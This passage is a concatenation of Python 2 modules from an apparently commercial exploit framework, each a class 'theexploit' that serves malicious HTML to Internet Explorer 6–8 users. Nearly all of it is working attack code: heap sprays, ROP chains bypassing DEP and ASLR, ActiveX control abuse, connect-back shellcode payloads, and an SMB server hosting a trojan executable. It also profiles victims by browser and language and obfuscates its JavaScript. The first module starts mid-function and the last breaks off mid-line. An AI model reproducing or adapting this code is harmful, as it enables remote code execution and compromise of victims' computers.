script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c))) # Obfuscate the script code (disabled for this exploit) self.isClientD = False if self.isClientD: self.log("WP> Running jsObfuscator") filedata += self.jsObfuscator.obfuscate(script) else: filedata += script # Add the reset of the filedata filedata += """</script> <body> <script> var arrr = new Array(); arrr[0] = window.document.createElement("img"); arrr[0]["src"] = "%s"; </script> <iframe src="%s"></iframe> </body> </html> """ % (wp_randomstring(1), self.filename2) return filedata def makefileIE8_XP(self): payload = pack('<L', 0x77C3B861) payload += pack('<L', 0x77C3B860) payload += pack('<L', 0x77C3A891) payload += self.wp_UniversalDEPBypassWinXP_VP( len(self.shellcode) + 512) payload += self.shellcode # heap chunk = 4096 bytes, canvas sc's vary between < & > 4096 so we add padding to consistantly use two chunks per block payload += wp_randomstring((5120 - len(payload))) filedata = """<html> <head> <script>""" script = wp_clientside_HeapLib(padding="%u0c0c") #script code script += """ var heap_obj = new heapLib.ie(0x20000); var nops = unescape("NOPS"); var code = unescape("SHELLCODE"); while (nops.length < 0x2000) nops += nops; var offset = nops.substring(0, 0x5F4); var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length); while (shellcode.length < 0x80000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var z=1; z < 0x300; z++) { heap_obj.alloc(block); } """ script = script.replace('SHELLCODE', wp_urluencode(payload)) script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c))) #Obfuscate the script code (disabled for this exploit) self.isClientD = False if self.isClientD: self.log("WP> Running jsObfuscator") filedata += self.jsObfuscator.obfuscate(script) else: filedata += script filedata += """</script> <body> <script> var arrr = new Array(); arrr[0] = window.document.createElement("img"); arrr[0]["src"] = "%s"; </script> <iframe src="%s"></iframe> </body> </html> """ % (wp_randomstring(1), self.filename2) return filedata def makefile2(self): filedata = """<html> <script> function funcB() { document.execCommand("selectAll"); }; function funcA() { document.write("%s"); parent.arrr[0].src = "%s\\u0c08\\u0c0c%s"; } </script> <body onload='funcB();' onselect='funcA()'> <div contenteditable='true'> . </div> </body> </html> """ % (wp_randomstring(1), wp_randomstring(4), wp_randomstring(58)) return filedata def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) cookies = clientheader.getStrValue(['Cookie']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') if clientheader.URL.count(self.filename): data = self.makefile(browser, osversion) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) elif clientheader.URL.count(self.filename2): self.log('WP> Serving Exploit Stage 2') data = self.makefile2() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): self.log('WP> This module must be run via HTTPSERVER') return 0
class theexploit(wp_exploit, httpclientside): PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".htm" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") self.vProtect = True self.useRawShellcode = True self.payloadFilename = "".join( [random.choice(string.lowercase) for x in range(8)]) + '.exe' self.sharefilename = "\\" + "".join( [random.choice(string.lowercase) for x in range(4)]) + "\\" + self.payloadFilename return def is_vulnerable(self, info_dict): """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s' % (self.version, targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 self.wp_getShellcodeType() if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefile(self): payload = "\\\\" + self.callback.ip + self.sharefilename filedata = """<html> <object classid='clsid:209EBDEE-065C-11D4-A6B8-00C04F0D38B7' id='target'/></object> <script language='vbscript'> target.ShowReport "PAYLOAD" </script> </html> """.replace('PAYLOAD', payload) return filedata def makesmb(self): self.log("WP> Starting wp_smbserver_backdoor to host payload") try: app = self.engine.getModuleExploit("wp_smbserver_backdoor") app.link(self) app.argsDict['sharefilename'] = self.sharefilename app.argsDict['trojanPayload'] = self.shellcode ret = app.run() except: self.log( "WP> Unable to start wp_smbserver_backdoor - port 443 already bound?" ) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return None, None time.sleep(5) return def makesploit(self, clientheader, clientbody): self.createShellcode() self.makesmb() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit file') data = self.makefile() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): self.makesmb() filedata = self.makefile() outputfile = wp_outputpath(self.filename) self.log("WP> Opening %s for output" % outputfile) fd = file(outputfile, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % (outputfile)) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS=["IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command"] # Clienside exploits default to HTTPMosdef PLAIN for clientD DEFAULT_PAYLOAD = 2 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.use_universal = True # We default these to false self.HTTPMOSDEF = False self.useSSLMOSDEF = False self.isClientD = False self.badstring='' # Shellcode is on heap or in dll #Randomise name for clientd self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") # For IE7 .Net Shellcode self.pc = 0x44444444; return def is_vulnerable(self, info_dict): # Called from ClientD, if recon modules are enabled # returns a value used to rank the exploit within attacking modules """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language)==type([]): language=language[0] # it's a list in actuality self.log("WP> language found: %s"%language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets,"-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() #self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if getattr(self,'useSSLMOSDEF',False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: # Potentially called from httpserver update shellcode accordingly if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host=self.target.interface self.filename=self.argsDict.get('filename',self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s'%(t,targets[t][0]) return def heapSpray(self,payload,heapspraycode): # This creates a heapspray of blocks that are 0x240000 (0x23f000 on Win7) in size # almost gauruntees that our spray block sits at 0xxxxx1000 or other 100 byte boundary heapprefix = wp_randomstring(220) # padding to 0x100 bytes script = """ memory = new Array(); var hs = unescape("HEAPSPRAYCODE"); while(hs.length < 0x11F600) hs += hs; hs = hs.substring(0, 0x11F600-DATALENGTH); hs = unescape("PREFIX") + hs + unescape("PAYLOAD"); try{ for(var i = 0; i < 400; i++) { memory[i]= hs.substring(0,hs.length); } } catch(err) {} """ script = script.replace('DATALENGTH',str( (0x100 + len(payload)) / 2 )) script = script.replace('HEAPSPRAYCODE',wp_urluencode(heapspraycode)) script = script.replace('PREFIX',wp_urluencode(heapprefix)) script = script.replace('PAYLOAD',wp_urluencode(payload)) #Obfuscate the script code if self.isClientD: self.log("WP> Running jsObfuscator") return self.jsObfuscator.obfuscate(script) else: return script def makefileWinXP(self,browser): # Exploit for Windows XP (DEP Bypass) landingAddress = 0x126A1004 heapspraycode = pack('<L', 0x77c1c04e) # RETN heapspraycode += pack('<L', landingAddress+4) # ptr heapspraycode += pack('<L', 0x77c1c04e) # RETN MSVCRT heapspraycode += pack('<L', 0x77c1c04e) # RETN heapspraycode += pack('<L', 0x77c1c04e) # RETN heapspraycode += pack('<L', 0x77c1f11d) # RETN 0C heapspraycode += pack('<L', 0x77c1c04e) # RETN heapspraycode += pack('<L', 0x77C3A634) # mov esp,ecx while len(heapspraycode) < (0x100-8): # Build out to 0x100 byte blocks heapspraycode += pack('<L', 0x77c1c04e) # RETN SLIDE heapspraycode += pack('<L', 0x77c1f11d) # RETN 0C POP over above data heapspraycode += pack('<L', 0x77c1c04e) # RETN depbypass = pack('<L', 0x77c1c04e) * 10 # buffer of ret slides depbypass += self.wp_UniversalDEPBypassWinXP_VP(len(self.shellcode)+8) # Set the payload payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" * 100) #pad the payload out to 0x100 bytes payload += wp_randomstring(256 - (len(payload)%256)) filedata = """ <html> <script language="JavaScript"> """ # script heapspray code filedata += self.heapSpray(payload,heapspraycode) # Add the reset of the filedata filedata+=""" </SCRIPT> <object classid="clsid:3EEEBC9A-580F-46EF-81D9-55510266413D" id="target"></object> <script language='vbscript'> x="xxxx" y=String(1060, "A") + unescape("%04%10%6a%12") + String(100, "C") z=1 target.Resample x,y,z </script> </html> """ return filedata def makefileIE8_VistaWin7(self): # Exploit for IE 8 On Windows 7/Vista # This page loads a .Net DLL # mscorie .Net DLL ASLR/DEP Bypass landingAddress = 0x126A1004 heapspraycode = pack('<L', 0x63F05761) # RETN heapspraycode += pack('<L', landingAddress) # ptr heapspraycode += pack('<L', 0x63F0575B) # MSCORIE:(0x63f0575b XCHG EAX,ESP) heapspraycode += pack('<L', 0x63F01D9A) # POP ESI, RETN heapspraycode += pack('<L', 0x63F05761) # RETN heapspraycode += pack('<L', 0x63F05761) # RETN heapspraycode += pack('<L', 0x63F0237E) # MSCOREIE: CALL DWORD PTR DS:[ECX+4] while len(heapspraycode) < (0x100-8): # Build out to 0x100 byte blocks heapspraycode += pack('<L', 0x63F05761) # RETN SLIDE heapspraycode += pack('<L', 0x63F03E9B) # RETN 30 POP over above data heapspraycode += pack('<L', 0x63F05761) # RETN depbypass = pack('<L', 0x63F05761) * 12 # buffer of ret slides # depbypass using mscorie depbypass += self.wp_mscorieDEPBypass(len(self.shellcode)+104) # Set the payload payload = depbypass + wp_randomnops(4) + self.shellcode + ("\x00" * 100) #pad the payload out to 0x100 bytes payload += wp_randomstring(256 - (len(payload)%256)) filedata = """ <html> <object classid="OURDLL" height="0" width="0"></object> <script language="JavaScript"> """ # script heapspray code filedata += self.heapSpray(payload,heapspraycode) # Add the reset of the filedata filedata+=""" </SCRIPT> <object classid="clsid:3EEEBC9A-580F-46EF-81D9-55510266413D" id="target"></object> <script language='vbscript'> x="xxxx" y=String(1060, "A") + unescape("%04%10%6a%12") + String(100, "C") z=1 target.Resample x,y,z </script> </html> """ filedata = filedata.replace('OURDLL', self.filename.replace('.html','.dll')) return filedata def makefileIE7(self): # Exploit for IE 7 # Uses the old .Net 2.0 bypass ASLR method landingAddress = 0x126A1004 heapspraycode = pack('<L', landingAddress) # ptr heapspraycode += pack('<L', landingAddress) # ptr heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code heapspraycode += pack('<L', self.pc) # Return to .Net DLL code while len(heapspraycode) < (0x100): # Build out to 0x100 byte blocks heapspraycode += pack('<L', 0x63F05761) # JUNK # Set the payload, payload is inside the loaded dll file payload = "" filedata = """ <html> <object classid="OURDLL#a.b" height="0" width="0"></object> <script language="JavaScript"> """ # script heapspray code filedata += self.heapSpray(payload,heapspraycode) # Add the reset of the filedata filedata+=""" </SCRIPT> <object classid="clsid:3EEEBC9A-580F-46EF-81D9-55510266413D" id="target"></object> <script language='vbscript'> x="xxxx" y=String(1060, "A") + unescape("%04%10%6a%12") + String(100, "C") z=1 target.Resample x,y,z </script> </html> """ filedata = filedata.replace('OURDLL', self.filename.replace('.html','.dll')) return filedata def makefile(self,browser,osversion): if osversion == "Windows XP": self.log('WP> Serving Windows XP exploit') return self.makefileWinXP(browser) if browser == "MSIE 8.0": self.log('WP> Serving MSIE 8.0 exploit') return self.makefileIE8_VistaWin7() if browser == "MSIE 7.0": self.log('WP> Serving MSIE 7.0 exploit') return self.makefileIE7() # Default to a non ASLR version self.log('WP> Serving Non ASLR Exploit') return self.makefileWinXP(browser) def makesploit(self,clientheader,clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header,body h=header('SERVER') b=body() self.log('WP> ****************************************') self.log("WP> URL Received: %s"%clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) # Get details browser,osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') #self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit html file') data=self.makefile(browser,osversion) if not data: return None,None b.setBody(data) h.addHeader('Content-Type','text/html') h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('.dll')): if browser == "MSIE 7.0": self.log('WP> Serving IE7 .Net DLL file') self.vProtect = True # Needed for this type of payload p = PElib() data = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) self.vProtect = False # Reset this else: self.log('WP> Serving IE8 .Net DLL file') p = PElib() data = p.createDotNETPEFileBuf("", self.pc) if not data: return None,None b.setBody(data) h.addHeader('Content-Type','application/octet-stream') else: self.log('WP> Redirecting to self') h.status='302' h.addHeader('Location',self.filename) h.addHeader('Content-Type','text/html') self.log('WP> ****************************************') return h,b def run(self): if (self.version == 0): filedata=self.makefile('','Windows XP') dlldata ="" elif (self.version ==1): filedata=self.makefile('MSIE 7.0','') self.vProtect = True # Needed for this type of payload p = PElib() dlldata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) self.vProtect = False # Reset this elif (self.version ==2): filedata=self.makefile('MSIE 8.0','') p = PElib() dlldata = p.createDotNETPEFileBuf("", self.pc) outputfile = wp_outputpath(self.filename) self.log("WP> Opening %s"%outputfile ) fd=file(outputfile,'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s'%outputfile) if dlldata != "": dllfile = wp_outputpath(self.filename.replace('html','dll')) # create the dll file f = open(dllfile,'wb') f.write(dlldata) f.flush() f.close self.log('WP> Created DLL file %s'%dllfile) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] DEFAULT_PAYLOAD = 1 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.badstring = "\x00\x09\x0b\x0c\x0d\x0e\x0f\x20\x3e\x7a\xfc\xff" #Ranomisze name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): # Called from ClientD, returns a value used to rank the exploit within attacking modules """ Check for IE 6 """ self.isClientD = True if "MSIE 6.0" in info_dict['user_agent']: self.log("WP> Target has MSIE 6") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] #it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s' % (self.version, targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if self.isClientD: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefile(self): # Make the exploit file depBp = ( "\xB7\x29\x05\x5C" "\x80\xF1\xFE\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" "\xF7\xF8\x07\x5C\xFF\xAE\x06\x5C\xB7\x29\x05\x5C\x56\x69\x72\x74" "\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x74\x30\x08\x5C" "\xB7\x29\x05\x5C\x75\x61\x6C\x41\x11\x11\x11\x11\x11\x11\x11\x11" "\x11\x11\x11\x11\x48\x65\x06\x5C\xB7\x29\x05\x5C\x6C\x6C\x6F\x63" "\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\xBB\x01\x08\x5C" "\xBF\xA1\x02\x5C\xBE\x01\x08\x5C\xB7\x29\x05\x5C\x38\xEA\x11\x5C" "\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x27\xF6\x07\x5C" "\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" "\x11\x11\x11\x11\xB7\x29\x05\x5C\x80\xF1\xFE\xFF\x11\x11\x11\x11" "\x11\x11\x11\x11\x11\x11\x11\x11\xF7\xF8\x07\x5C\xFF\xAE\x06\x5C" "\xB7\x29\x05\x5C\x07\xE1\xFA\x4A\x11\x11\x11\x11\x11\x11\x11\x11" "\x11\x11\x11\x11\x1A\x5A\x07\x5C\x11\x11\x11\x11\xC4\x36\x06\x5C" "\x2E\xD5\x07\x5C\x90\x90\x90\x90\x90\x90\x90\x90\x7D\xD5\x02\x5C" "\x47\x42\x05\x5C\xDA\x49\x02\x5C\xB7\x29\x05\x5C\x8D\x06\x04\x5C" "\x11\x11\x11\x11\x16\xF0\x07\x5C\x11\x11\x11\x11\x64\xA7\x06\x5C" "\x16\xF0\x07\x5C\x16\xF0\x07\x5C\x16\xF0\x07\x5C\x16\xF0\x07\x5C" "\x82\x92\x02\x5C\x16\xF0\x07\x5C\x74\x30\x08\x5C\xB7\x29\x05\x5C" "\xFF\xEF\xFF\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" "\xF7\xF8\x07\x5C\x9E\x7E\x02\x5C\xB8\x01\x08\x5C\xB7\x29\x05\x5C" "\xC0\xFF\xFF\xFF\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11" "\xF7\xF8\x07\x5C\xBE\x01\x08\x5C\x56\x5B\x06\x5C\x11\x11\x11\x11" "\x11\x11\x11\x11\x11\x11\x11\x11\xC1\x01\x08\x5C\xC1\x01\x08\x5C" "\x2E\x4B\x07\x5C\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22" "\x22\x22\x22\x22\x11\x11\x11\x11\x11\x11\x11\x11\xC8\xC1\x06\x5C" "\x5F\x6E\x07\x5C\xA5\x66\x06\x5C\x22\x22\x22\x22\x11\x11\x11\x11") searchcode = wp_SearchCode(True) depSc = 'c00kc00k' depSc += depBp depSc += self.shellcode depSc += "11" * 100 payload = pack('<L', 0x5C0735C9) * 10 # ret payload += depBp payload += searchcode payload += "C" * (56 - len(searchcode)) payload += pack('<L', 0x5C054CB2) # add esp,420 payload += "A" * 140 payload += "B" * 100 payload += "C" * 100 payload += "D" * 100 payload += "E" * 100 payload += "F" * 100 #Base filedata filedata = """<html><body> <object classid="clsid:36723f97-7aa0-11d4-8919-ff2d71d0d32c" id="iprint"> <param name=operation value=op-client-interface-version> <param name=result-type value=url> <param name=call-back-url value=PAYLOAD> <param name=call-url value=SHELLCODE> </body> </html> """ filedata = filedata.replace('PAYLOAD', payload) filedata = filedata.replace('SHELLCODE', depSc) return filedata def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit file') data = self.makefile() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') return h, b def run(self): filedata = self.makefile() self.log("WP> Opening %s for output" % (self.filename)) fd = file(self.filename, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % (self.filename)) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS=["IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command"] DEFAULT_PAYLOAD = 1 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" #Ranomisze name for clientd self.filename="".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): # Called from ClientD, returns a value used to rank the exploit within attacking modules """ Check for IE 6 """ self.isClientD = True if "MSIE 6.0" in info_dict['user_agent']: self.log("WP> Target has MSIE 6") language = info_dict['plugins'].get("language", "") if type(language)==type([]): language=language[0] #it's a list in actuality self.log("WP> language found: %s"%language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets,"-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s'%(self.version,targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if self.isClientD: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host=self.target.interface self.filename=self.argsDict.get('filename',self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s'%(t,targets[t][0]) return def makefile(self): searchcode = wp_SearchCode(True) payload = wp_randomstring(1024) + pack('<L', 0x7C341124) payload += wp_randomstring(12) payload += self.wp_sayonaraASLRDEPBypass((len(searchcode)+8)) payload += searchcode payload += wp_randomstring(1024) payload += 'c00kc00k' payload += self.wp_sayonaraASLRDEPBypass((len(self.shellcode)+8)) payload += self.shellcode payload += wp_randomstring(8192 - len(payload)) #Base filedata filedata="""<html> <object classid='clsid:5C2A52BD-2250-4F6B-A4D2-D1D00FCD748C' id='target' ></object> <script language='javascript'> arg1 = "PAYLOAD"; arg2 = "1"; arg3 = "1"; target.CreateProcess(arg1, arg2, arg3); </script> </html> """ filedata = filedata.replace('PAYLOAD', payload) return filedata def makesploit(self,clientheader,clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header,body h=header('SERVER') b=body() self.log("WP> URL Received: %s"%clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) self.log('WP> User agent of connecting host: %s' % user_agent) if clientheader.URL.count(self.filename): self.log('WP> Serving exploit file') data=self.makefile() if not data: return None,None b.setBody(data) h.addHeader('Content-Type','text/html') h.addHeader('Set-Cookie','SessionID=%d' % self.jsObfuscator.getXORKey()) else: self.log('WP> Redirecting to self') h.status='302' h.addHeader('Location',self.filename) h.addHeader('Content-Type','text/html') return h,b def run(self): filedata=self.makefile() outputfile = wp_outputpath(self.filename) self.log("WP> Opening %s for output"%outputfile) fd=file(outputfile,'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s'%(outputfile)) return 1
class theexploit(wp_exploit, httpclientside): ###################################################################################### ## WP> Dialog Information ##########################s############################################################ PAYLOADS = [ "IE Inject Connect Back", "HTTPMOSDEF SSL", "HTTPMOSDEF PLAIN", "Execute Command" ] DEFAULT_PAYLOAD = 1 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.badstring = "\x00\x09\x0d\xff" #Randomisze name for clientd self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" # HTTP Custom Stuff self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): # Called from ClientD, returns a value used to rank the exploit within attacking modules """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] #it's a list in actuality self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s' % (self.version, targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): # If Called from clientD, update shellcode accordingly if self.isClientD: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 # Selected shell options self.wp_getShellcodeType() # If called from clientD there will be no target here if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefile(self): # Make the exploit file depSc = pack('<L', 0x1001403B) # PUSH ESP, POP EDI, depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x10011BC5) #MOV EAX,EDI, depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x1001175B) #ADD EAX,20 depSc += pack('<L', 0x1001175B) depSc += pack('<L', 0x1001175B) depSc += pack('<L', 0x1001175B) depSc += pack('<L', 0x1001175B) depSc += pack('<L', 0x1001175B) depSc += pack('<L', 0x10017374) #POP ECX depSc += pack('<L', 0x22222220) depSc += pack('<L', 0x1002B040) #MOV EDX,EAX depSc += pack('<L', 0x10027938) #MOV EAX,EDX depSc += pack('<L', 0x10022BB2) #MOV DWORD PTR DS:[EDX],EAX depSc += pack('<L', 0x10027BE0) #XOR EAX,EAX depSc += pack('<L', 0x10027BD7) #ADD EDX,4 depSc += pack('<L', 0x10022276) #POP EAX depSc += pack('<L', 0x111118E1) # Size 2000 bytes depSc += pack('<L', 0x10017374) # POP ECX depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x1001BE16) #SUB EAX,ECX depSc += pack('<L', 0x10022BB2) #MOV DWORD PTR DS:[EDX],EAX depSc += pack('<L', 0x10027BE0) #XOR EAX,EAX depSc += pack('<L', 0x10027BD7) #ADD EDX,4 depSc += pack('<L', 0x10022276) #POP EAX depSc += pack('<L', 0x11112111) depSc += pack('<L', 0x10017374) # POP ECX depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x1001BE16) #SUB EAX,ECX depSc += pack('<L', 0x10022BB2) #MOV DWORD PTR DS:[EDX],EAX depSc += pack('<L', 0x10027BE0) #XOR EAX,EAX depSc += pack('<L', 0x10027BD7) #ADD EDX,4 depSc += pack('<L', 0x10022276) #POP EAX depSc += pack('<L', 0x11111151) depSc += pack('<L', 0x10017374) # POP ECX depSc += pack('<L', 0x11111111) depSc += pack('<L', 0x1001BE16) #SUB EAX,ECX depSc += pack('<L', 0x10022BB2) #MOV 